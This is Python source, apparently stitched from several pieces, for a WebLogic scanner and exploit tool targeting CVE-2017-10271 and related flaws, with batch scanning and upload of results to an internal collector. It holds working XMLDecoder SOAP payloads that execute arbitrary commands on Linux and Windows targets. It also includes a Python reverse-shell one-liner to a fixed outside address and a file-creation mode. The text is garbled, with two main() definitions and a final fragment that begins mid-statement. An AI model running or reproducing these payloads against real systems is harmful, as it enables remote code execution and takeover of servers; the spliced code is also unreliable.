def test():
    """Ad-hoc console run of ``cve_2016_3510`` over the collector's target list.

    Pulls the URL list filtered to vulnerability id 030104 from the hard-coded
    internal collector and prints ``<url>---><result>`` for each entry.
    Nothing is uploaded; this helper only writes to stdout.
    """
    source = "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do?vulnerabilityID=030104"
    for target in utils.get_url_list(source):
        outcome = cve_2016_3510(target)
        # Single-argument print keeps the Python 2 output byte-identical.
        print(target + "--->" + str(outcome))
def main():
    """CLI entry point for the WebLogic WLS-WSAT checks (CVE-2017-10271 / CVE-2017-10352).

    The run mode is selected by which options are combined; the branches below
    are mutually exclusive and any combination not matched prints the option
    help and exits:

    * ``-b --time-based``: batch, time-based check of every host the collector returns.
    * ``-b``: batch check of every host the collector returns, results uploaded.
    * ``-H HOST -p PORT``: check one host on both CoordinatorPortType endpoints.
    * ``-H HOST -p PORT --time-based``: time-based check of one host.
    * ``-H HOST -p PORT --create-file``: send the file-creation payload to one host.
    * ``-H HOST -p PORT -c CMD -O linux|win``: send the command payload to one host.
    * ``-f FILE``: check every ``host:port`` line of FILE (no upload).

    Target lists and results go through a hard-coded internal collector
    (172.17.1.2:8080); there is no option to point the tool elsewhere.
    Every check relies on the ``/wls-wsat/`` component being reachable on the
    target, which is also what patching or removing that component (or
    blocking the path at the perimeter) takes away.
    """
    parser = optparse.OptionParser()
    parser.add_option('-H', dest='tgtHost', type="string", help='specify target host')
    # -p is parsed as int here; every URL builder below wraps it in str().
    parser.add_option('-p', dest='tgtPort', type='int', help="specify target port")
    parser.add_option(
        '-b',
        action="store_true",
        dest='batch',
        default=False,
        help="do a batch scan obtaining url list from remote server")
    parser.add_option('--time-based', action="store_true", dest='time_base', help="time based", default=False)
    parser.add_option('-c', dest='command', help='command to execute')
    parser.add_option('-f', dest='filepath', help='file to load')
    parser.add_option('-O', dest='os', help='choose OS')
    parser.add_option('--create-file', action="store_true", dest='create_file', help="create file using native java", default=False)
    (options, args) = parser.parse_args()
    tgtHost = options.tgtHost
    tgtPort = options.tgtPort
    batch = options.batch
    time_base = options.time_base
    command = options.command
    filepath = options.filepath
    # NOTE(review): this rebinds the name `os` inside main(), shadowing any
    # `import os` the module has; rename the local (e.g. target_os) when touching this.
    os = options.os
    create_file = options.create_file
    if batch and time_base and not tgtHost and not tgtPort and not command and not create_file:
        # Batch, time-based mode: the time-based check takes (host, port) pairs
        # rather than full URLs, so every collector entry is split first.
        urllist = utils.get_url_list(
            "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
        )
        if urllist:
            # process_url yields an indexable pair: [0] is used as the host, [1] as the port.
            target_host_port = map(utils.process_url, urllist)
            pool = ThreadPool(50)
            final_results_10271 = pool.map(cve_2017_10271_time_based, target_host_port)
            pool.close()
            pool.join()
            # "030103" is the collector's id for CVE-2017-10271; rows are keyed by the original URL.
            json_data_10271 = utils.assembly_data(
                "030103", dict(zip(urllist, final_results_10271)))
            print utils.post_data(
                json_data_10271,
                "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
            )
    # `is None` is the idiomatic form of the two `== None` tests below.
    elif batch and tgtHost == None and tgtPort == None and not time_base and not command and not create_file:
        urllist = utils.get_url_list(
            "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
        )
        #print urllist
        # NOTE(review): these asserts test whether the literal strings are *elements*
        # of urllist, not whether any entry starts with a scheme — presumably the
        # latter was intended. They are also stripped under `python -O`, so they
        # are not a reliable input check. TODO confirm intent.
        assert 'https://' not in urllist
        assert 'http://' not in urllist
        assert 'http' not in urllist
        assert 'https' not in urllist
        if urllist:
            # Every target is tried on both WLS-WSAT endpoints; a hit on either
            # counts (see the `x or y` merge below).
            target_url_list1 = map(
                lambda url: 'http://' + utils.process_url(url)[0] + ":" + str(
                    utils.process_url(url)[1]) + '/wls-wsat/CoordinatorPortType',
                urllist)
            target_url_list2 = map(
                lambda url: 'http://' + utils.process_url(url)[0] + ":" + str(
                    utils.process_url(url)[1]) + '/wls-wsat/CoordinatorPortType11',
                urllist)
            pool = ThreadPool(50)
            results1_10271 = pool.map(cve_2017_10271, target_url_list1)
            results2_10271 = pool.map(cve_2017_10271, target_url_list2)
            results1_10352 = pool.map(cve_2017_10352, target_url_list1)
            results2_10352 = pool.map(cve_2017_10352, target_url_list2)
            pool.close()
            pool.join()
            final_results_10271 = [
                x or y for x, y in zip(results1_10271, results2_10271)
            ]
            json_data_10271 = utils.assembly_data(
                "030103", dict(zip(urllist, final_results_10271)))
            # if 'http://www.gzzwjw.gov.cn' in dict(zip(urllist, final_results_10271)):
            #     print dict(zip(urllist, final_results_10271))['http://www.gzzwjw.gov.cn']
            final_results_10352 = [
                x or y for x, y in zip(results1_10352, results2_10352)
            ]
            # "030111" is the collector's id for CVE-2017-10352.
            json_data_10352 = utils.assembly_data(
                "030111", dict(zip(urllist, final_results_10352)))
            # print json_data_10271
            # print json_data_10352
            print utils.post_data(
                json_data_10271,
                "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
            )
            print utils.post_data(
                json_data_10352,
                "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
            )
    elif tgtHost and tgtPort and not batch and not time_base and not command and not create_file:
        # Single host: both endpoints, both checks; results are only reported by
        # the check functions themselves, nothing is uploaded here.
        url1 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType'
        url2 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType11'
        cve_2017_10271(url1)
        cve_2017_10271(url2)
        cve_2017_10352(url1)
        cve_2017_10352(url2)
    elif tgtHost and tgtPort and time_base and not batch and not command and not create_file:
        # The time-based check takes a (host, port) tuple, matching the batch path above.
        cve_2017_10271_time_based((tgtHost, tgtPort))
    elif tgtHost and tgtPort and not time_base and not batch and not command and create_file:
        # payload_create_file_10271, sig_10271 and send_payload are module-level
        # names defined outside this block.
        url1 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType'
        url2 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType11'
        send_payload(url1, payload_create_file_10271, sig_10271, "cve_2017_10271")
        send_payload(url2, payload_create_file_10271, sig_10271, "cve_2017_10271")
    # Command mode needs both -c and -O; -c alone falls through to print_help.
    elif tgtHost and tgtPort and not time_base and not batch and command and os:
        # XMLDecoder/ProcessBuilder SOAP header as used by the WLS-WSAT
        # deserialization issue; `{}` is filled by str.format with the -c value.
        payload_linux_10271 = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>{}</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> '''
        payload_windows_10271 = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>C:\Windows\System32\cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>{}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> '''
        url1 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType'
        url2 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType11'
        # NOTE(review): only 'linux' and 'win' are handled; any other -O value
        # silently does nothing (no else branch, no help output).
        if os == 'linux':
            if command == 'shell':
                # The literal 'shell' is swapped for a connect-back one-liner to a
                # fixed address baked into the tool. For defenders that address
                # (144.202.87.92:80) is a static indicator of this tool's use.
                command = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("144.202.87.92",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' '''
            # print payload_linux_10271
            # The full request body is echoed to stdout before it is sent.
            print payload_linux_10271.format(command)
            send_payload(url1, payload_linux_10271.format(command), sig_10271, "cve_2017_10271")
            send_payload(url2, payload_linux_10271.format(command), sig_10271, "cve_2017_10271")
        elif os == 'win':
            print payload_windows_10271.format(command)
            send_payload(url1, payload_windows_10271.format(command), sig_10271, "cve_2017_10271")
            send_payload(url2, payload_windows_10271.format(command), sig_10271, "cve_2017_10271")
    elif not tgtHost and not tgtPort and filepath and not command and not batch and not time_base:
        # One entry per line (presumably host:port). Only the CoordinatorPortType
        # endpoint is tried here, unlike the other branches which also try
        # CoordinatorPortType11 — TODO confirm whether that is intended.
        with open(filepath, 'r') as f:
            u_list = f.readlines()
        for i in u_list:
            url = "http://" + i.strip() + '/wls-wsat/CoordinatorPortType'
            # send_payload(url,payload_linux_10271, sig_10271, "cve_2017_10271")
            cve_2017_10271(url)
            cve_2017_10352(url)
    else:
        parser.print_help()
        # `exit` is the site-module helper; sys.exit is the robust form (needs `import sys`).
        exit(0)
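def main():
    """CLI entry point for the ``cve_*`` WebLogic checks defined in this module.

    Two modes, chosen by option combination:

    * ``-b`` on its own: fetch the target list from the hard-coded internal
      collector, run every check against each entry on a thread pool, and
      post one result set per check back to the collector (the first argument
      to ``assembly_data`` is the collector's vulnerability id).
    * ``-H HOST -p PORT`` without ``-b``: run each check once against
      ``http://HOST:PORT``; nothing is uploaded in this mode.

    Any other combination prints the option help and exits with status 0.

    Fix: ``json_2893`` was written as ``utils.assembly_data("030114"), dict(...)``
    — a misplaced parenthesis that called ``assembly_data`` with a single
    argument (presumably a TypeError, since every other call passes two) and
    bound a tuple to ``json_2893``. It now mirrors the other four result sets.

    NOTE(review): an earlier ``def main()`` appears above on this page; if both
    live in one module the later definition silently replaces the earlier one.
    """
    parser = optparse.OptionParser()
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    # Port is kept as a string so it can be concatenated straight into the URL.
    parser.add_option('-p', dest='tgtPort', type='string', help='specify target port')
    parser.add_option('-b', dest='batch', help='run a batch scan', action="store_true", default=False)
    (options, args) = parser.parse_args()
    tgtHost = options.tgtHost
    tgtPort = options.tgtPort
    batch = options.batch

    # Both collector endpoints live on one hard-coded internal host; there is
    # no option to point the tool elsewhere without editing the source.
    list_url = "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
    record_url = 'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'

    if batch and tgtHost is None and tgtPort is None:
        urllist = utils.get_url_list(list_url)
        if urllist:
            # 100 concurrent workers; each pool.map() runs to completion before
            # the next check starts, so the checks are sequential per target set.
            pool = ThreadPool(100)
            results_0638 = pool.map(cve_2016_0638, urllist)
            results_3248 = pool.map(cve_2017_3248, urllist)
            results_3510 = pool.map(cve_2016_3510, urllist)
            results_2628 = pool.map(cve_2018_2628, urllist)
            results_2893 = pool.map(cve_2018_2893, urllist)
            pool.close()
            pool.join()
            # Result rows are keyed by the target URL the collector handed out.
            json_0638 = utils.assembly_data("030108", dict(zip(urllist, results_0638)))
            json_3248 = utils.assembly_data("030101", dict(zip(urllist, results_3248)))
            json_3510 = utils.assembly_data("030106", dict(zip(urllist, results_3510)))
            json_2628 = utils.assembly_data("030113", dict(zip(urllist, results_2628)))
            json_2893 = utils.assembly_data("030114", dict(zip(urllist, results_2893)))
            # Upload order is unchanged from the original: 3510, 0638, 3248, 2628, 2893.
            for json_data in (json_3510, json_0638, json_3248, json_2628, json_2893):
                print(utils.post_data(json_data, record_url))
    elif tgtHost and tgtPort and not batch:
        url = 'http://' + tgtHost + ":" + tgtPort
        for check in (cve_2016_3510, cve_2016_0638, cve_2017_3248, cve_2018_2628, cve_2018_2893):
            check(url)
    else:
        parser.print_help()
        # `exit` is the site-module helper; sys.exit is the robust form (needs `import sys`).
        exit(0)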
help="specify a ip target") parser.add_argument('-b', '--batch', dest="batch", default=False, action="store_true", help="batch scan") args = parser.parse_args() target = args.target batch = args.batch if target and not batch: check(target) elif batch and not target: urllist = utils.get_url_list( "http://192.168.17.89:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do" ) if urllist: pool = ThreadPool(20) results = pool.map(check, urllist) # print dict(zip(urllist,results)) json_data = utils.assembly_data("060102", dict(zip(urllist, results))) r = utils.post_data( json_data, "http://192.168.17.89:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do" ) print "Uploading data to remote server, please wait..." # time.sleep(2) if r: